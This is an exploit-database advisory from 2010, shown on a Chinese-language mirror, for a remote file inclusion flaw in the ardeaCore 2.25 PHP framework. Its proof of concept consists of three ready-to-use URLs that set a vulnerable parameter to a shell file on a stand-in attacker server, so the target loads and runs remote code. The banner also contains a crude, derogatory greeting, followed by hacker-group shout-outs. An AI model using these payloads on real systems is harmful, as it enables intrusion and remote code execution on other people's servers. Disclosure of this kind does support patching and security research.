ardeaCore 2.25 – PHP Framework Remote File Inclusion

  • 作者: n0n0x
    日期: 2010-12-29
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15840/
  • ******************************************************
    [!] Discovered: n0n0x
    [!] Homepage: http://priasantai.uni.cc/
    [!] Remote: yes
    ******************************************************
    
    *****************************************[ Hello gay ]***********************************************
    ****************************************************************************************************************
    [x] PoC:
    
    http://host/ardeaCore_v2.25/ardeaCore/lib/core/ardeaInit.php?pathForArdeaCore=[http://server/shell.tmp???]
    http://host/ardeaCore_v2.25/ardeaCore/lib/core/ardeaBlog.php?CURRENT_BLOG_PATH=[http://server/shell.tmp???]
    http://host/ardeaCore_v2.25/ardeaCore/lib/core/mvc/ardeaMVC.php?appMVCPath=[http://server/shell.tmp???]
    ****************************************************************************************************************
    
    *****************************************[ Hello gay ]***********************************************
     
    ****************************************************************************************************************
    [!] Thanks:
     
    manadocoding.net, sekuritionline.net
    ****************************************************************************************************************
    [!] Greetz:
     
    str0ke, angky.tatoki,EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, zreg, Valentin,team_elite
    devilbat.
    
    [!] special thanks : cr4wl3r - cyberl0g
    ****************************************************************************************************************